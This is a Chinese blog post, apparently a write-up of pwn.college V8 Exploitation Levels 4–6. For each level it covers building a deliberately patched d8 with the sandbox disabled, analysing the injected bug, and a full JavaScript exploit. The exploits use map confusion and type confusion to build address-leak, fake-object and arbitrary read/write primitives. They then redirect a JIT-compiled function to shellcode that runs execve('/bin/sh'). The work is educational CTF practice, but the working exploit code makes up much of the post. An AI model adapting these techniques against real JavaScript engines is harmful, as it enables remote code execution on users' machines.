Pwncollege V8 Exploitation (中)

原创 于 2025-12-15 14:00:01 发布 · 384 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ctf

2025博客之星年度评选已开启 10w+人浏览 951人参与

Level4(能改写数组的length,污染map)

环境搭建

git reset --hard 5a2307d0f2c5b650c6858e2b9b57b335a59946ff
source ~/.bashrc
gclient sync -D
git apply < ../Level4/patch
./tools/dev/v8gen.py x64.release
subl ./out.gn/x64.release/args.gn
python3.10 /home/saulgoodman/Desktop/v8_pwn/depot_tools/ninja.py -C ./out.gn/x64.release d8 -j 5

修改参数如下:

is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false

分析

注册了一个setLength方法。

image-20251206110309808

这里是创建了一个新的文件来写这个方法,文件在 src/builtins/array-setlength.tq

定义了ArrayPrototypeSetLength函数。

  • js-implicit 表示这些参数是隐式传递的(由 V8 运行时提供)
  • context: NativeContext - 当前 JavaScript 执行的上下文
  • receiver: JSAny - 函数调用时的 this 值(接收者对象)
  • length: JSAny - 用户传递的 length 参数

后面就是将用户传递的 length 参数转换为 Smi 类型,然后就是将 receiver(this 值)转换为 JSArray 类型,最后就直接赋值了,修改了array的长度。

image-20251206110357352

漏洞利用

因为本题只能设置JsArrayLength

所以大致思路如下:

先构造两个相邻的double_array,再构造一个obj。因为我们可以设置Length,导致我们有了越界读写。

我们先利用第一个 数组对象 利用越界读取中间数组的 map值以及properties

我们再利用中间的 数组对象 利用越界读取下一个objmap值以及properties

后面可以通过污染 Map来获取地址以及任意写了,对于获取地址,我们修改正常objmap中间double数组的map,这样读取obj的元素时就会根据map(已经被修改成double数组的map)来判断读取的方式,因为被修改了,就会当成浮点数,所以 obj[0] 被解释为浮点数(实际是对象指针)。

EXP

var buf = new ArrayBuffer(8);       //分配8字节内存
var f64 = new Float64Array(buf,0,1);    //1个64位浮点数
var u32 = new Uint32Array(buf,0,2);     //2个32位无符号整数
var i32 = new Int32Array(buf,0,2);      //2个32位有符号整数
var u64 = new BigUint64Array(buf,0,1);  //1个64位大整数

function hex(str){
    return str.toString(16).padStart(16,0);
}

function logg(str,val){
    console.log("[+] "+ str + ": " + "0x" + hex(val));
}

function unptr(v){
    return v & 0xfffffffen;
}

function ptr(v){
    return v | 1;
}

function u32_to_f64(low,high){      //combined (two 4 bytes) word to float
    u32[0] = low;
    u32[1] = high;
    return f64[0];
}

function f64_to_u64(v){     //float to bigint
    f64[0] = v;
    return u64[0];
}

function u64_to_f64(v){     //bigint to float
    u64[0] = v;
    return f64[0];
}

function u64_to_u32_0(v) {
    u64[0] = v;
    return u32[0];
}

function u64_to_u32_1(v) {
    u64[0] = v;
    return u32[1];
}



function shellcode() {// Promote to ensure not GC during training
    // JIT spray machine code form of `execve("/bin/sh", NULL, NULL)" 
    return [
    1.9710255989868046e-246,
    1.9711456320011228e-246,
    1.97118242283721e-246,
    1.9711826272864685e-246,
    1.9712937950614383e-246,
    -1.6956275879669133e-231
    ];
}

for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation


var tag = 1;
var array = new Array(0x1000).fill(1.1);
var rw_array = new Array(0x1000).fill(2.2);
var obj = {array,rw_array};

array.setLength(0x10000);
var rw_map_addr = u64_to_u32_0(f64_to_u64(array[0x1000]));
var rw_properties_addr = u64_to_u32_1(f64_to_u64(array[0x1000]));

logg("rw_map_addr",rw_map_addr);
logg("rw_properties_addr",rw_properties_addr);

// %DebugPrint(array);
// %DebugPrint(rw_array);
// %DebugPrint(obj);
// %SystemBreak();

rw_array.setLength(0x10000);
var obj_map_addr = u64_to_u32_0(f64_to_u64(rw_array[0x1000]));
var obj_properties_addr = u64_to_u32_1(f64_to_u64(rw_array[0x1000]));
logg("obj_map_addr",obj_map_addr);
logg("obj_properties_addr",obj_properties_addr);
// %SystemBreak();


function GetAddressOf(object) {
    rw_array[0x1000] = u32_to_f64(obj_map_addr,obj_properties_addr);
    obj[0] = object;
    rw_array[0x1000] = u32_to_f64(rw_map_addr,rw_properties_addr);  //obj 现在使用浮点数组 Map
    return u64_to_u32_0(f64_to_u64(obj[0]));  //所以 obj[0] 被解释为浮点数(实际是对象指针)
}


function AAR(addr){
    rw_array[0x1000] = u32_to_f64(rw_map_addr,rw_properties_addr);
    rw_array[0x1001] = u32_to_f64((addr-0x8) | tag,0x20000);
    return f64_to_u64(obj[0]);
}

function AAW(addr,value){
    rw_array[0x1000] = u32_to_f64(rw_map_addr,rw_properties_addr);
    rw_array[0x1001] = u32_to_f64(addr-0x8 | tag,0x2000);
    obj[0] = u64_to_f64(value);
}

var shellcode_addr = GetAddressOf(shellcode);
var code_addr = unptr(AAR(shellcode_addr+0xc));
var instruction_start_addr = code_addr+0x14n;
var shellcode_start = AAR(Number(instruction_start_addr))+0x6bn;
AAW(Number(instruction_start_addr),shellcode_start);

logg("shellcode_addr",shellcode_addr);
logg("code_addr",code_addr);
logg("instruction_start_addr",instruction_start_addr);
logg("shellcode_start",shellcode_start);

shellcode();

// %DebugPrint(shellcode);
// %SystemBreak();

调试分析

如图是两个数组和obj的结构,前两个数组的length已经被修改了,因此我们有了越界读写。

image-20251207223813237

image-20251207223826454

image-20251207223846507

通过越界读取,我们可以拿到中间数组objmap值这些.

image-20251207224212363

当我们读取shellcode的地址时,如下图,Map以及properties被修改成中间数组的mapproperties,所以当读取obj[0]时第一个元素也就是shellcode会被解析成浮点数也就是实际是对象指针。

image-20251207224521359

如上我们可以拿到shellcode的地址,然后还要获取shellcode中的code地址,shellcode结构如下

image-20251207225011647

当我们通过 var code_addr = unptr(AAR(shellcode_addr+0xc));获取code地址时

要修改obj结构map以及elements,如图根据map还是会将元素解析成浮点数也就是能读取地址,然后将elements修改为 shellcode_addr+0xc就能读取code的地址。

image-20251207225347663

如下图就能看到code的地址,前8字节是map后8字节才是code_addr,也就是通过obj[0]读出.

image-20251207225528247

拿到了code_addr,那么根据前面几个题的方法,我们可以很轻松的拿到instruction_start_addr,

然后再利用上面同样的手法读取instruction_start_addr的值后加上0x6b,就可以拿到shellcode_start的地址。

image-20251207225716475

拿到地址后就能利用越界写,将instruction_start_addr的值改成shellcode_start就能拿到shell了.

Level5 (越界读写8字节)

环境搭建

git reset --hard 5a2307d0f2c5b650c6858e2b9b57b335a59946ff
source ~/.bashrc
gclient sync -D
git apply < ../Level5/patch
./tools/dev/v8gen.py x64.release
subl ./out.gn/x64.release/args.gn  #注意要修改参数
python3.10 /home/saulgoodman/Desktop/v8_pwn/depot_tools/ninja.py -C ./out.gn/x64.release d8 -j 5

修改参数如下:

is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false

分析

添加了一个offByOne的方法

image-20251209223017140

这个就是该方法的主要实现,先对receiver判断是否是JSArray以及数组的元素类型必须是简单类型(即没有 holes、不是对象等)

然后强制转换成JSArray后获取其元素,要求其元素必须是PACKED_DOUBLE_ELEMENTS

然后再判断参数个数不超过两个,实际只传入一个参数,因为args[0]receiver(this)args[1]是可选的写入值。

再把元素以FixedDoubleArray来储存。再获取数组长度并转换为uint32_t类型。

当我们没有传入参数时会进入if分支read mode),read mode直接返回elements[len]的元素内容,很典型的一个越界

当参入参数时会进入else分支(write mode),write mode会先判断传入的值是否是IsNumber,然后将值转换成double类型就直接给elements[len]赋值。

通过分析可以发现这里明显有个 8字节溢出的读写操作,思路大众和Level4一样。

image-20251209223157667

PACKED_DOUBLE_ELEMENTS包括了PACKED_DOUBLE_ELEMENTS、HOLEY_DOUBLE_ELEMENTS、PACKED_ELEMENTSHOLEY_ELEMENTS。如下图:

img

漏洞分析

经过上面的分析可以知道本题是一个8字节的越界读写漏洞。意味着我们可以读写mapproperties

当我们可以控制properties时,我们就有了一种新的利用法式,这里先简单介绍一下。

下面这张图说明了Named Properties通过properties来索引,Indexed Properties通过 elements来索引

img

下面显示的是in-object会直接存储在elements的后面,然后normal properties就还是通过properties来索引

img

列如:

var oob_array = [1.1];
var obj = {in_object: 1};
obj.out_object1 = 2;

查看输出和内存,可以发现 objJS_OBJECT_TYPE类型,

image-20251212150355950

这里的in-object直接存储在elements后面

屏幕截图 2025-12-12 150510

out-objs 也就是normal properties,都使用了properties来索引,这里的值都*2,是因为这个smi的表示

image-20251212151100560

结合上面的观察,可以通过8字节的溢出可以覆盖到properties,那么其实就可以控制normal properties,如果修改为一个objelements然后使用obj.out_object1 = xxxx;索引,同时修改值,这样就可以修改elements的length,同时继续去修改objlength,这样就可以有一个rw_array,有这个rw_array之后,写addressOffakeObjectAARAAW是很简单的了。

EXP

var buf = new ArrayBuffer(8);       //分配8字节内存
var f64 = new Float64Array(buf,0,1);    //1个64位浮点数
var u32 = new Uint32Array(buf,0,2);     //2个32位无符号整数
var i32 = new Int32Array(buf,0,2);      //2个32位有符号整数
var u64 = new BigUint64Array(buf,0,1);  //1个64位大整数

function hex(str){
    return str.toString(16).padStart(16,0);
}

function logg(str,val){
    console.log("[+] "+ str + ": " + "0x" + hex(val));
}

function unptr(v){
    return v & 0xfffffffen;
}

function ptr(v){
    return v | 1;
}

function u32_to_f64(low,high){      //combined (two 4 bytes) word to float
    u32[0] = low;
    u32[1] = high;
    return f64[0];
}

function f64_to_u64(v){     //float to bigint
    f64[0] = v;
    return u64[0];
}

function u64_to_f64(v){     //bigint to float
    u64[0] = v;
    return f64[0];
}

function u64_to_u32_0(v) {
    u64[0] = v;
    return u32[0];
}

function u64_to_u32_1(v) {
    u64[0] = v;
    return u32[1];
}



function shellcode() {// Promote to ensure not GC during training
    // JIT spray machine code form of `execve("/bin/sh", NULL, NULL)" 
    return [
    1.9710255989868046e-246,
    1.9711456320011228e-246,
    1.97118242283721e-246,
    1.9711826272864685e-246,
    1.9712937950614383e-246,
    -1.6956275879669133e-231
    ];
}

for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation

function read_OffByOne(target){
    return f64_to_u64(target.offByOne())
}

function write_OffByOne(target,val){
    target.offByOne(Number(val));
}

var oob_array = [1.1];
var obj = {in_object: 1};
obj.out_object1 = 2;
var second_array = [2.2];


var obj_map_addr = u64_to_u32_0(read_OffByOne(oob_array));
var obj_properties_addr = u64_to_u32_1(read_OffByOne(oob_array));
var elements_addr_of_oob_array = obj_properties_addr - 0x64;
logg("obj_map_addr",obj_map_addr);
logg("obj_properties_addr",obj_properties_addr);
logg("elements_addr_of_oob_array",elements_addr_of_oob_array);


// %DebugPrint(oob_array);
// %DebugPrint(obj);
// %DebugPrint(second_array);
// %SystemBreak();

write_OffByOne(oob_array,u32_to_f64(obj_map_addr,elements_addr_of_oob_array-0x4));
obj.out_object1 = 0x1000;
write_OffByOne(oob_array,u32_to_f64(obj_map_addr,elements_addr_of_oob_array-4-0x10))
obj.out_object1 = 0x1000;

var second_array_map_properties = f64_to_u64(oob_array[0x10]);

second_array_map = u64_to_u32_0(second_array_map_properties);
second_array_properties = u64_to_u32_1(second_array_map_properties);
logg("second_array_map",second_array_map);
logg("second_array_properties",second_array_properties);

function GetAddresOf(object){
    oob_array[0x10] = u32_to_f64(obj_map_addr,0);
    second_array[0] = object;
    oob_array[0x10] = u32_to_f64(second_array_map,0);
    return f64_to_u64(second_array[0]);
}

function FakeObj(addr){
    oob_array[0x10] = u32_to_f64(second_array_map,0);
    second_array[0] = u32_to_f64(addr,0);
    oob_array[0x10] = u32_to_f64(obj_map_addr,0);
    return second_array[0];
}
var fake_arr = [u32_to_f64(second_array_map,0),u32_to_f64(0,0x1000)];

var fake_arr_addr = u64_to_u32_0(GetAddresOf(fake_arr));
var fake_obj = FakeObj(fake_arr_addr+0x54);

// %DebugPrint(fake_arr);
// %DebugPrint(fake_obj);
// %SystemBreak();

function AAR(addr){
    fake_arr[1] = u32_to_f64(addr-8,0x1000);
    return f64_to_u64(fake_obj[0]);
}

function AAW(addr,val){
    fake_arr[1] = u32_to_f64(addr-8,0x1000);
    fake_obj[0] = u64_to_f64(val);
}

var shellcode_addr = u64_to_u32_0(GetAddresOf(shellcode));
var code_addr = u64_to_u32_0(AAR(shellcode_addr+0xc));
var instruction_start_addr = AAR(code_addr + 0x14);
var shellcode_start = instruction_start_addr + 0x6bn;
AAW(Number(code_addr+0x14),shellcode_start);

logg("shellcode_addr",shellcode_addr);
logg("code_addr",code_addr);
logg("instruction_start_addr",instruction_start_addr);
logg("shellcode_start",shellcode_start);
shellcode()

调试分析

首先先利用越界读取泄露 obj_map_addrobj_properties_addrelements_addr_of_oob_array

image-20251212153416237

然后利用越界写,改写 oob_arraylength以及oob_arrayelementslength.

image-20251212153345245

image-20251212153502136

改写完length后我们就可以任意越界读取了。

然后就是泄露 second_arraymapproperties

image-20251212153859922

image-20251212153736323

因为前面拿到了Objmap和properties,现在又有second_arramap和properties,因此我们可以利用oob_array越界写改写second_arraymap和properties来造成混淆来泄露地址。

为了达到任意地址泄露读写的能力,我们还需要伪造一个obj。

fake_arr结构如下:

image-20251212190452135

image-20251212191154738

fake_obj通过map混肴,改second_arrayelements[0]分配一个obj,这个fake_obj的地址是fake_arr+0x54的地方,实现fake_obj_elements_addr == fake_arr[1] ;

image-20251212190842490

image-20251212191120970

然后就可以通过修改fake_arr[1]然后读写fake_obj[0]来达到任意地址读写的目的。

Level6

环境搭建

git reset --hard 5a2307d0f2c5b650c6858e2b9b57b335a59946ff
source ~/.bashrc
gclient sync -D
git apply < ../Level6/patch
./tools/dev/v8gen.py x64.release
subl ./out.gn/x64.release/args.gn  #注意要修改参数
python3.10 /home/saulgoodman/Desktop/v8_pwn/depot_tools/ninja.py -C ./out.gn/x64.release d8 -j 5

修改参数如下:

is_component_build = false
is_debug = false
target_cpu = "x64"
v8_enable_sandbox = false
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
dcheck_always_on = false
use_goma = false
v8_code_pointer_sandboxing = false

分析

注册了一个functionMap方法

image-20251212212449046

这里主要就是判断传入的参数是不是函数(JSFunction),然后对函数进行遍历,取出arr的元素然后转换成obj也就是下面的elem_handle,然后就是解释调用func_obj,也就是用户传入的自定义函数,参数就是elem_handle,将返回值再写入原本的elements内。

image-20251212211527629

漏洞分析

这里没有对于元素类型进行检查,意味着我返回的元素类型可以改变为与原本对象不同的类型,那么这样就会导致原本对象的map改变,这样就可以实现类型混淆。

这里有个需要注意的就是:取值固定认为arrayFixedDoubleArray,这是因为在functionMap开头已经检测过array的类型。但是由于JS Object的类型是动态的,我们完全有可能在自定义的func_obj中修改array的元素导致类型发生转变,从而实现类型混淆。

对于上面的分析,我们就可以尝试构造一个函数,动态的修改arr的类型,下面是addressOf的编写,采用switch case的结构,使用idx进行遍历。第一次执行arr[2] = obj ,成功的导致了map解析的类型发生改变,然后idx1的时候,就会解析出来target的地址.

function GetAddressOf(obj){
    var arr = [1.1,2.2,3.3];
    var addr = 0;
    var idx = 0;
    arr.functionMap((value)=>{
        switch(idx){
        case 0:
            arr[2] = obj;
            idx++;
            return value;
        case 1:
            addr = f64_to_u64(value);
            idx++;
            return value;
        default:
            idx++;
            return value;
        }
    });
    return addr;
}

idx=1可以索引出原本arr[2]的原因是由于类型发生转换,变成obj类型之后,转换成pointer,对应了四字节(也就是指针压缩),所以索引arridx会发生改变。如下图:

img

arr[2] = obj时,arr会变为object类型,此时第二次以double的方式访问原本的arr[1]的位置时,取到的数据的低4位即为object的地址。

接着就是fakeObject,思路是很类似的,这里还是修改arr的类型,然后解析穿入地址,伪造成一个obj,接着调用arr[0]返回,索引的问题和上面是一样的,可以动态调试看下

function fakeObject(address){
    var arr = [1.1,2.2,3.3];
    var obj = {};
    var idx = 0;
    arr.functionMap((value)=>{
        switch(idx){
        case 0:
            idx++;
            arr[2] = obj;
            return u32_to_f64(address,0);
        default:
            idx++;
            return value;
        }
    });
    return arr[0];
}

EXP

var buf = new ArrayBuffer(8);       //分配8字节内存
var f64 = new Float64Array(buf,0,1);    //1个64位浮点数
var u32 = new Uint32Array(buf,0,2);     //2个32位无符号整数
var i32 = new Int32Array(buf,0,2);      //2个32位有符号整数
var u64 = new BigUint64Array(buf,0,1);  //1个64位大整数

function hex(str){
    return str.toString(16).padStart(16,0);
}

function logg(str,val){
    console.log("[+] "+ str + ": " + "0x" + hex(val));
}

function unptr(v){
    return v & 0xfffffffen;
}

function ptr(v){
    return v | 1;
}

function u32_to_f64(low,high){      //combined (two 4 bytes) word to float
    u32[0] = low;
    u32[1] = high;
    return f64[0];
}

function f64_to_u64(v){     //float to bigint
    f64[0] = v;
    return u64[0];
}

function u64_to_f64(v){     //bigint to float
    u64[0] = v;
    return f64[0];
}

function u64_to_u32_0(v) {
    u64[0] = v;
    return u32[0];
}

function u64_to_u32_1(v) {
    u64[0] = v;
    return u32[1];
}



function shellcode() {// Promote to ensure not GC during training
    // JIT spray machine code form of `execve("/bin/sh", NULL, NULL)" 
    return [
    1.9710255989868046e-246,
    1.9711456320011228e-246,
    1.97118242283721e-246,
    1.9711826272864685e-246,
    1.9712937950614383e-246,
    -1.6956275879669133e-231
    ];
}

for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation

function GetAddressOf(target){
    var arr = [1.1,2.2,3.3];
    var addr = 0;
    var idx = 0;

    // %DebugPrint(arr);
    // %SystemBreak();

    arr.functionMap((value)=>{
        switch(idx){
        case 0:
            arr[2] = target;
            idx++;
            // logg("value",f64_to_u64(value));
            // %DebugPrint(arr);
            // %SystemBreak();
            return value;
        case 1:
            addr = f64_to_u64(value);
            // logg("value",f64_to_u64(value));
            // %SystemBreak();

            idx++;
            return value;
        default:
            idx++;
            return value;
        }
    });
    return addr;
}

function fakeObject(address){
    var arr = [1.1,2.2,3.3];
    var obj = {};
    var idx = 0;
    arr.functionMap((value)=>{
        switch(idx){
        case 0:
            idx++;
            arr[2] = obj;
            // %DebugPrint(arr);
            // %SystemBreak();

            return u32_to_f64(address,0);
        default:
            idx++;
            return value;
        }
    });
    return arr[0];
}

var fake_double_map = [u64_to_f64(0x31040404001c01b5n),u64_to_f64(0x0a8007ff11000844n)];
var fake_double_map_addr = u64_to_u32_0(GetAddressOf(fake_double_map))+0x54;
logg("fake_double_map_addr",fake_double_map_addr);

var fake_array = [u32_to_f64(fake_double_map_addr,0x0),u32_to_f64(0x1,0x1000)];

var fake_array_addr = u64_to_u32_0(GetAddressOf(fake_array))+0x54;
var fake_obj = fakeObject(fake_array_addr);
logg("fake_array_addr",fake_array_addr);

// %DebugPrint(fake_double_map);
// %DebugPrint(fake_array);
// %DebugPrint(fake_obj);
// %SystemBreak();


function AAR(addr){
    fake_array[1] = u32_to_f64(addr-8,0x1000);
    return f64_to_u64(fake_obj[0]);
}

function AAW(addr,val){
    fake_array[1] = u32_to_f64(addr-8,0x1000);
    fake_obj[0] = u64_to_f64(val);
}

var shellcode_addr = u64_to_u32_0(GetAddressOf(shellcode));
var code_addr = u64_to_u32_0(AAR(shellcode_addr + 0xC));
var instruction_start_addr = AAR(code_addr+0x14);
var shellcode_start = instruction_start_addr + 0x6bn;
AAW(Number(code_addr+0x14),shellcode_start);

logg("shellcode_addr",shellcode_addr);
logg("code_addr",code_addr);
logg("instruction_start_addr",instruction_start_addr);
logg("shellcode_start",shellcode_start)
shellcode();

调试分析

对于GetAddressOf在case 0处下断点查看可以看到 arr[2] = obj,然后当case 1时就能取到传入的obj的地址。

image-20251215131921998

然后伪造一个 fake_double_map,其值是 fake_double_mapmap的前16字节内容,如图:
image-20251215132553784

map的内容是:

image-20251215132623084

这里设置这个值的原因是后面伪造fakeobj时,fakeobjmap值要合法所以要这么设置.

然后 fake_double_map_addr = fake_double_map+0x54处时,刚好取到 fake_double_mapelements的第一个元素,也就是0x220e001081cd-1+0x8的值.

image-20251215133022715

然后再构造一个 fake_array,其值就是fake_double_map_addr,和一个u32_to_f64(0x1,0x1000),

image-20251215133502191

image-20251215133552248

然后 fake_array_addr = fake_array+0x54也是刚好取到第一个元素。

image-20251215133650156

最后就是在 fake_array_addr伪造一个fakeObj, 这个fakeObj的地址就是0x220e0010846c+1,map地址就是0x01081d5,elements的地址就是fake_array的第2个元素。如下就是fake_obj的结构

image-20251215134030843

仔细观察就可以发现 fake_obj的地址就是fake_array+0x54也就是fake_array第一个元素处的地址,

fake_objmap就是fake_array第一个元素fake_objelement就是fake_array的第二个元素

然后 fake_array第一个元素也就是 fake_double_map_addr , 也就是 fake_double_map中第一个元素所在的地址。

也就是说 fake_objmap中的值就是fake_double_map数组中伪造的数据

image-20251215134611029

综上所述我们就可以构造出AAR,AAW.

可以通过修改fake_array的第二个元素来修改 fake_obj的elements,后续思路就和前面的Level一样了。

探索与利用 (Exploration and Exploitation)
AI天才研究院
07-25 974
探索与利用 (Exploration and Exploitation) 关键词: 强化学习 决策理论 收益最大化
Chrome v8 pwn
sky123博客
04-17 5154
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
Pwncollege V8 Exploitation ()
saulgoodman的博客
12-05 966
本文介绍了在V8引擎中实现一个自定义Array.run()方法的步骤。首先通过git回退到指定版本,配置编译环境并修改参数后编译release版本。接着分析了Array.run()的实现细节,该方法会检查数组类型、元素类型和长度限制,通过mmap分配可执行内存并将数组中的double数据作为shellcode执行。最后提供了生成double类型shellcode的Python脚本和调用示例,成功执行了获取shell的代码。整个过程展示了如何在V8中实现自定义内置函数并利用其执行任意代码的能力。
Exploration and Exploitation - 探索和利用
Steve Wang's blog
08-30 2775
Exploration and Exploitation(探索和利用)是强化学习需要去平衡的一个点,即我应该去探索新的选项还是充分利用我已经有的选项以取得最大收益(博主注),它是强化学习一个非常重要的点,而且是非常依赖领域的,比如针对顾客、学生、患者等,不同的领域探索和利用的侧重会有所不同。 Exploration and Exploitation Agent只能体会到它尝试的那些动作,这明显...
推荐系统中的exploration-exploitation算法
BertDai的博客
01-14 4031
推荐系统里面有两个经典问题:EE和冷启动。前者涉及到平衡准确和多样,后者涉及到产品算法运营等一系列。 Bandit算法是一种简单的在线学习算法,常常用于尝试解决这两个问题,本文为你介绍基础的Bandit算法及一系列升级版,以及对推荐系统这两个经典问题的思考。 什么是Bandit算法 为选择而生 我们会遇到很多选择的场景。上哪个大学,学什么专业,去哪家公司,中午吃什么等等。这些事情,都让选择
Exploitation and Exploration
Jony0917的专栏
04-17 661
推荐系统的经典问题之一,利用(Exploitation) 与 探索(Exploration)问题 Exploitation:满足已知的用户需求 Exploration:探索未知的用户需求 Exploitation的必要性比较容易理解,通过满足用户已知的需求,产生用户价值,这也是推荐系统存在的意义。Exploration的价值怎么理解呢?首先,对于新用户而言,系统并不知道用户的需求,这时必须通过Exploration探索和发现用户的需求。其次,对于老用户而言,兴趣点也是在不断变化中的,这时也需要通过Exp
【Chrome V8系列01】初识V8漏洞
QYbudong的博客
10-06 1311
*]在学习本系列前,你应该对JS语法介绍 - JavaScript | MDN和二进制PWN堆栈漏洞原理和利用栈介绍 - CTF Wiki有基本认识。[*]本系列将基于中的V8 Exploitation以及rjk师傅V8仓库进行学习,建议先尝试自己做一下,有任何问题请通过评论或QQ进行讨论。[*]学完本篇文章后,你将掌握如何使用浮点数制作V8 shellcode。恭喜你入门V8漏洞利用啦!
exploration 和 exploitation 的区别
qq_44838702的博客
02-02 5043
exploration 是开发未知领域,而exploitation 是利用已知状态。 在遗传算法中: 全局探索(Exploration):交叉重组与突变是算法全局探测能力的主要构成要素。 局部探测(Exploitation):对种群个体的选择是算法局部探测能力的主要构成要素。 关于Exploration能力太强的话,即使是到达了最优解集的区域中,下一步, 依然会远离这个区域(解的变化比较大,和前面是什么关系不大),从而找不到收敛的值。 Exploitation比较强,则会把局部最优解区域解集更容易被找到,但
什么是EE(exploration and exploitation)问题
u012073033的专栏
03-18 3790
Exploration and Exploitation 问题(EE问题)意译为:探索与利用问题,以商业口吻为例,探索新的利润模式和保持当前利润率的冲突问题。 而以上这样的一种情形也被成为Explore-Exploit Dilemma (EE困境):有两个完全不同的目标,一个是你想要保持你现在情况即利润(利用),另一个是你要尝试新的想法但是可能会造成利润损失(探索)。 ...
picoCTF-Web Exploitation-Trickster
huckers的博客
05-12 1017
连接木马地址,以前用菜刀,管理webshell,爬取网站文件信息挺好用的,百度找到一个中国蚁剑就决定试试,看介绍好像也是根据菜刀改的。这应该是个上传漏洞了,十几年没用过了,不知道思路是不是一样的,以前的思路是通过上传漏洞想办法上传一个木马,拿到webshell,今天试试看能不能成功。随便制作一个png图片(直接截图保存),越小越好,便于我们查看修改文件信息,上传png图片。,(这里后缀的验证是前端js做的,用Burpsuite发送请求就不必考虑后缀的验证问题了)扩展名,然后还要验证文件字节的正确性。
Heap Exploitation(简体中文)1
08-03
《Heap Exploitation(简体中文)1》是一本针对想要深入理解堆内存,特别是glibc的'malloc'和'free'实现的书籍。这本书主要分为两个部分:一是堆内存的详细描述,二是堆利用技术的介绍。以下是关键知识点的详细说明: ...
heap-exploitation.pdf
02-01
### 堆溢出利用(Heap Exploitation) #### 前言 本文将深入探讨堆内存管理机制及其潜在的安全漏洞。重点在于GNU C库(glibc)中的`malloc`和`free`函数实现,以及如何利用这些机制进行攻击。 #### 堆内存 堆...
Hacking - The Art of Exploitation, 2nd Ed
06-15
machine code to exploitation. In addition, this edition features a bootable LiveCD based on Ubuntu Linux that can be used in any computer with an x86 processor, without modifying the computer’s ...
The art of exploitation.7z
08-21
Preface This book explains the details of various hacking techniques, many of which get very technical. While the fundamental programming concepts that these hacking techniques build from are ...
语音信号的采集、谱分析和滤波.zip
12-14
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
在线考试系统研究与实现_iq653_springbootiq653数据库文档.doc
12-14
在线考试系统研究与实现_iq653_springbootiq653数据库文档
基于微信小程序的付费自习室管理系统_ssm02y6o数据库文档.doc
12-14
基于微信小程序的付费自习室管理系统_ssm02y6o数据库文档.doc
基于模型预测控制对PMSM进行FOC控制,模拟控制了PMSM的速度(Simulink仿真实现)
12-14
基于模型预测控制对PMSM进行FOC控制,模拟控制了PMSM的速度(Simulink仿真实现)内容概要:本文介绍了基于模型预测控制(MPC)对永磁同步电机(PMSM)进行磁场定向控制(FOC),并通过Simulink仿真平台实现了对PMSM转速的精确控制。文中详细阐述了FOC控制策略与MPC算法的结合方式,利用MPC的多步预测和滚动优化特性提升系统动态响应性能与抗干扰能力,仿真结果验证了该方法在速度调节中的有效性与稳定性。此外,文档还附带了相关MATLAB/Simulink代码资源链接,便于读者复现实验并进一步研究。; 适合人群:具备自动控制理论基础、电机控制背景及一定MATLAB/Simulink仿真经验的高校研究生、科研人员或从事电机驱动开发的工程技术人员。; 使用场景及目标:①深入理解FOC与MPC在电机控制中的协同机制;②掌握基于Simulink的PMSM控制系统建模与仿真方法;③为高性能电机控制算法的研究与优化提供可复现的技术参考; 阅读建议:建议结合提供的仿真代码进行实操演练,重点关注MPC控制器的设计参数设置与FOC模块的集成逻辑,同时可通过调整负载扰动等条件测试系统鲁棒性,加深对先进控制策略应用的理解。
200智能模拟量转化函数
最新发布
12-14
C# S7-200smartPLC 上位机代码 简介 本仓库提供了一个使用C#编写的S7-200smartPLC上位机源代码。 该上位机程序可以实现对电机的控制,包括电机的启停与转速调节,同时还能监控变量参数的变化。 功能特点 电机控制:通过上位机界面,用户可以方便地控制电机的启动、停止以及调整电机的转速。 变量监控:实时监控PLC中的变量参数变化,确保系统运行状态的实时反馈。 源代码开放:提供完整的C#源代码,方便开发者进行二次开发和定制。 使用说明 环境配置:确保开发环境已安装.NET Framework及相关开发工具。 导入项目:将本仓库的源代码导入到开发环境中。 配置PLC连接:根据实际PLC的IP地址和端口配置上位机的连接参数。 下载前可以先看下教程 https://pan.quark.cn/s/fecc0635644f 编译运行:编译项目并运行,即可通过上位机界面进行电机控制和变量监控。 注意事项 请确保PLC与上位机在同一网络中,并且网络连接正常。 在修改源代码时,请注意保持代码的稳定性和兼容性。 贡献 欢迎开发者对本项目进行改进和优化,可以通过提交Pull Request的方式贡献代码。 许可证 本项目采用MIT许可证,详情请参阅LICENSE文件。 下载链接 CS7-200smartPLC上位机代码 (备用: 备用下载)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值